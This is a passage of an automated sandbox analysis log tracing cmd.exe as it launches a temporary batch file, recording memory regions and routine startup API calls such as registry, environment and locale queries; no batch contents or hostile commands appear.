0xa0 Thread: id = 129 os_tid = 0x9c Thread: id = 130 os_tid = 0x98 Thread: id = 131 os_tid = 0x94 Thread: id = 132 os_tid = 0x90 Thread: id = 133 os_tid = 0x8c Thread: id = 134 os_tid = 0x88 Thread: id = 135 os_tid = 0x84 Thread: id = 136 os_tid = 0x80 Thread: id = 137 os_tid = 0x7c Thread: id = 138 os_tid = 0x78 Thread: id = 139 os_tid = 0x70 Thread: id = 140 os_tid = 0x6c Thread: id = 141 os_tid = 0x68 Thread: id = 142 os_tid = 0x64 Thread: id = 143 os_tid = 0x60 Thread: id = 144 os_tid = 0x5c Thread: id = 145 os_tid = 0x58 Thread: id = 146 os_tid = 0x54 Thread: id = 147 os_tid = 0x50 Thread: id = 148 os_tid = 0x4c Thread: id = 149 os_tid = 0x74 Thread: id = 150 os_tid = 0x48 Thread: id = 151 os_tid = 0x44 Thread: id = 152 os_tid = 0x40 Thread: id = 153 os_tid = 0x3c Thread: id = 154 os_tid = 0x38 Thread: id = 155 os_tid = 0x34 Thread: id = 156 os_tid = 0x30 Thread: id = 157 os_tid = 0x2c Thread: id = 158 os_tid = 0x28 Thread: id = 159 os_tid = 0x24 Thread: id = 160 os_tid = 0x20 Thread: id = 161 os_tid = 0x1c Thread: id = 162 os_tid = 0x18 Thread: id = 163 os_tid = 0xc Thread: id = 164 os_tid = 0x10 Thread: id = 165 os_tid = 0x14 Thread: id = 166 os_tid = 0x8 Thread: id = 176 os_tid = 0xe68 Thread: id = 177 os_tid = 0xec4 Process: id = "23" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7eef7360" os_pid = "0xcc4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xae4" cmd_line = "cmd /c \"\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat\" \"" cur_dir = "C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1401 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1402 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1403 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1404 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1405 start_va = 0x49e50000 end_va = 0x49e9bfff entry_point = 0x49e5829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1406 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1407 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1408 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1409 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1410 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1411 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1412 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1413 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1414 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1415 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1416 start_va = 0x721b0000 end_va = 0x721b6fff entry_point = 0x721b1230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1417 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1418 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1419 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1420 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1421 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1422 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1423 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1424 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1425 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1426 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1427 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1428 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1429 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1430 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1431 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1432 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1433 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1434 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Region: id = 1435 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1436 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1437 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1438 start_va = 0x110000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1439 start_va = 0x1390000 end_va = 0x165efff entry_point = 0x1390000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 167 os_tid = 0xcc8 [0051.070] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fd5c | out: lpSystemTimeAsFileTime=0x24fd5c*(dwLowDateTime=0x4fb622e0, dwHighDateTime=0x1d34280)) [0051.070] GetCurrentProcessId () returned 0xcc4 [0051.070] GetCurrentThreadId () returned 0xcc8 [0051.070] GetTickCount () returned 0x148c2 [0051.070] QueryPerformanceCounter (in: lpPerformanceCount=0x24fd54 | out: lpPerformanceCount=0x24fd54*=326992812) returned 1 [0051.072] GetModuleHandleA (lpModuleName=0x0) returned 0x49e50000 [0051.072] __set_app_type (_Type=0x1) [0051.072] __p__fmode () returned 0x768231f4 [0051.072] __p__commode () returned 0x768231fc [0051.072] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e721a6) returned 0x0 [0051.072] __getmainargs (in: _Argc=0x49e74238, _Argv=0x49e74240, _Env=0x49e7423c, _DoWildCard=0, _StartInfo=0x49e74140 | out: _Argc=0x49e74238, _Argv=0x49e74240, _Env=0x49e7423c) returned 0 [0051.072] GetCurrentThreadId () returned 0xcc8 [0051.072] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcc8) returned 0x38 [0051.072] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76590000 [0051.072] GetProcAddress (hModule=0x76590000, lpProcName="SetThreadUILanguage") returned 0x765e24c2 [0051.072] SetThreadUILanguage (LangId=0x0) returned 0x409 [0051.074] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0051.074] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fcec | out: phkResult=0x24fcec*=0x0) returned 0x2 [0051.074] VirtualQuery (in: lpAddress=0x24fd23, lpBuffer=0x24fcbc, dwLength=0x1c | out: lpBuffer=0x24fcbc*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.074] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fcbc, dwLength=0x1c | out: lpBuffer=0x24fcbc*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0051.074] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fcbc, dwLength=0x1c | out: lpBuffer=0x24fcbc*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0051.074] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fcbc, dwLength=0x1c | out: lpBuffer=0x24fcbc*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.074] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fcbc, dwLength=0x1c | out: lpBuffer=0x24fcbc*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0051.074] GetConsoleOutputCP () returned 0x1b5 [0051.074] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0051.074] SetConsoleCtrlHandler (HandlerRoutine=0x49e6e72a, Add=1) returned 1 [0051.074] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.074] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0051.074] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.074] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e741ac | out: lpMode=0x49e741ac) returned 1 [0051.074] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.074] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0051.075] _get_osfhandle (_FileHandle=0) returned 0x3 [0051.075] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e741b0 | out: lpMode=0x49e741b0) returned 1 [0051.075] _get_osfhandle (_FileHandle=0) returned 0x3 [0051.075] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0051.075] GetEnvironmentStringsW () returned 0x420240* [0051.075] FreeEnvironmentStringsW (penv=0x420240) returned 1 [0051.075] GetEnvironmentStringsW () returned 0x420240* [0051.075] FreeEnvironmentStringsW (penv=0x420240) returned 1 [0051.075] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ec5c | out: phkResult=0x24ec5c*=0x40) returned 0x0 [0051.075] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ec64, lpData=0x24ec68, lpcbData=0x24ec60*=0x1000 | out: lpType=0x24ec64*=0x0, lpData=0x24ec68*=0xf0, lpcbData=0x24ec60*=0x1000) returned 0x2 [0051.075] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ec64, lpData=0x24ec68, lpcbData=0x24ec60*=0x1000 | out: lpType=0x24ec64*=0x4, lpData=0x24ec68*=0x1, lpcbData=0x24ec60*=0x4) returned 0x0 [0051.075] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ec64, lpData=0x24ec68, lpcbData=0x24ec60*=0x1000 | out: lpType=0x24ec64*=0x0, lpData=0x24ec68*=0x1, lpcbData=0x24ec60*=0x1000) returned 0x2 [0051.075] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ec64, lpData=0x24ec68, lpcbData=0x24ec60*=0x1000 | out: lpType=0x24ec64*=0x4, lpData=0x24ec68*=0x0, lpcbData=0x24ec60*=0x4) returned 0x0 [0051.075] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ec64, lpData=0x24ec68, lpcbData=0x24ec60*=0x1000 | out: lpType=0x24ec64*=0x4, lpData=0x24ec68*=0x40, lpcbData=0x24ec60*=0x4) returned 0x0 [0051.076] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ec64, lpData=0x24ec68, lpcbData=0x24ec60*=0x1000 | out: lpType=0x24ec64*=0x4, lpData=0x24ec68*=0x40, lpcbData=0x24ec60*=0x4) returned 0x0 [0051.076] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ec64, lpData=0x24ec68, lpcbData=0x24ec60*=0x1000 | out: lpType=0x24ec64*=0x0, lpData=0x24ec68*=0x40, lpcbData=0x24ec60*=0x1000) returned 0x2 [0051.076] RegCloseKey (hKey=0x40) returned 0x0 [0051.076] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ec5c | out: phkResult=0x24ec5c*=0x40) returned 0x0 [0051.076] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ec64, lpData=0x24ec68, lpcbData=0x24ec60*=0x1000 | out: lpType=0x24ec64*=0x0, lpData=0x24ec68*=0x40, lpcbData=0x24ec60*=0x1000) returned 0x2 [0051.076] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ec64, lpData=0x24ec68, lpcbData=0x24ec60*=0x1000 | out: lpType=0x24ec64*=0x4, lpData=0x24ec68*=0x1, lpcbData=0x24ec60*=0x4) returned 0x0 [0051.076] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ec64, lpData=0x24ec68, lpcbData=0x24ec60*=0x1000 | out: lpType=0x24ec64*=0x0, lpData=0x24ec68*=0x1, lpcbData=0x24ec60*=0x1000) returned 0x2 [0051.076] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ec64, lpData=0x24ec68, lpcbData=0x24ec60*=0x1000 | out: lpType=0x24ec64*=0x4, lpData=0x24ec68*=0x0, lpcbData=0x24ec60*=0x4) returned 0x0 [0051.076] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ec64, lpData=0x24ec68, lpcbData=0x24ec60*=0x1000 | out: lpType=0x24ec64*=0x4, lpData=0x24ec68*=0x9, lpcbData=0x24ec60*=0x4) returned 0x0 [0051.076] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ec64, lpData=0x24ec68, lpcbData=0x24ec60*=0x1000 | out: lpType=0x24ec64*=0x4, lpData=0x24ec68*=0x9, lpcbData=0x24ec60*=0x4) returned 0x0 [0051.076] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ec64, lpData=0x24ec68, lpcbData=0x24ec60*=0x1000 | out: lpType=0x24ec64*=0x0, lpData=0x24ec68*=0x9, lpcbData=0x24ec60*=0x1000) returned 0x2 [0051.076] RegCloseKey (hKey=0x40) returned 0x0 [0051.076] time (in: timer=0x0 | out: timer=0x0) returned 0x59ddfa12 [0051.076] srand (_Seed=0x59ddfa12) [0051.076] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat\" \"" [0051.076] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat\" \"" [0051.076] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e75260 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0051.076] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x420248, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0051.076] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0051.076] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0051.076] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0051.077] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0051.077] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0051.077] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0051.077] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0051.077] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0051.077] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0051.077] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0051.077] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0051.077] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0051.077] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0051.077] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24fa28 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0051.077] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nBufferLength=0x104, lpBuffer=0x24fa28, lpFilePart=0x24fa24 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x24fa24*="Desktop") returned 0x20 [0051.077] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop")) returned 0x11 [0051.077] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f7a4 | out: lpFindFileData=0x24f7a4) returned 0x4200d0 [0051.077] FindClose (in: hFindFile=0x4200d0 | out: hFindFile=0x4200d0) returned 1 [0051.077] FindFirstFileW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR", lpFindFileData=0x24f7a4 | out: lpFindFileData=0x24f7a4) returned 0x4200d0 [0051.077] FindClose (in: hFindFile=0x4200d0 | out: hFindFile=0x4200d0) returned 1 [0051.077] _wcsnicmp (_String1="BGC6U8~1", _String2="BGC6u8Oy yXGxkR", _MaxCount=0xf) returned 15 [0051.077] FindFirstFileW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFindFileData=0x24f7a4 | out: lpFindFileData=0x24f7a4) returned 0x4200d0 [0051.077] FindClose (in: hFindFile=0x4200d0 | out: hFindFile=0x4200d0) returned 1 [0051.077] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop")) returned 0x11 [0051.078] SetCurrentDirectoryW (lpPathName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop")) returned 1 [0051.078] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 1 [0051.078] GetEnvironmentStringsW () returned 0x420458* [0051.078] FreeEnvironmentStringsW (penv=0x420458) returned 1 [0051.078] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e75260 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0051.079] GetConsoleOutputCP () returned 0x1b5 [0051.079] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0051.079] GetUserDefaultLCID () returned 0x409 [0051.079] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e74950, cchData=8 | out: lpLCData=":") returned 2 [0051.079] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24fb68, cchData=128 | out: lpLCData="0") returned 2 [0051.079] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24fb68, cchData=128 | out: lpLCData="0") returned 2 [0051.079] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24fb68, cchData=128 | out: lpLCData="1") returned 2 [0051.079] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e74940, cchData=8 | out: lpLCData="/") returned 2 [0051.079] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e74d80, cchData=32 | out: lpLCData="Mon") returned 4 [0051.079] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e74d40, cchData=32 | out: lpLCData="Tue") returned 4 [0051.079] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e74d00, cchData=32 | out: lpLCData="Wed") returned 4 [0051.079] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e74cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0051.079] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e74c80, cchData=32 | out: lpLCData="Fri") returned 4 [0051.079] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e74c40, cchData=32 | out: lpLCData="Sat") returned 4 [0051.079] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e74c00, cchData=32 | out: lpLCData="Sun") returned 4 [0051.079] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e74930, cchData=8 | out: lpLCData=".") returned 2 [0051.079] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e74920, cchData=8 | out: lpLCData=",") returned 2 [0051.079] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0051.080] GetConsoleTitleW (in: lpConsoleTitle=0x4204d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0051.080] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76590000 [0051.080] GetProcAddress (hModule=0x76590000, lpProcName="CopyFileExW") returned 0x765cac6c [0051.080] GetProcAddress (hModule=0x76590000, lpProcName="IsDebuggerPresent") returned 0x765d3ea8 [0051.080] GetProcAddress (hModule=0x76590000, lpProcName="SetConsoleInputExeNameW") returned 0x765e2732 [0051.082] _wcsicmp (_String1="\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat\"", _String2=")") returned -7 [0051.082] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat\"") returned 68 [0051.082] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat\"") returned 68 [0051.082] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat\"") returned 71 [0051.082] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat\"") returned 71 [0051.082] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat\"") returned 80 [0051.082] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat\"") returned 80 [0051.083] GetConsoleTitleW (in: lpConsoleTitle=0x24f860, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0051.083] GetFileAttributesW (lpFileName="\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat\"" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop\\\"c:\\users\\bgc6u8~1\\appdata\\local\\temp\\iun4816.bat\"")) returned 0xffffffff [0051.083] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0051.083] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0051.083] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0051.083] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0051.083] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0051.083] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0051.083] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0051.083] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0051.083] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0051.083] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0051.083] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0051.083] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0051.083] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0051.083] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0051.083] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0051.083] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0051.083] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0051.083] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0051.083] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0051.083] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0051.083] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0051.083] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0051.083] _wcsicmp 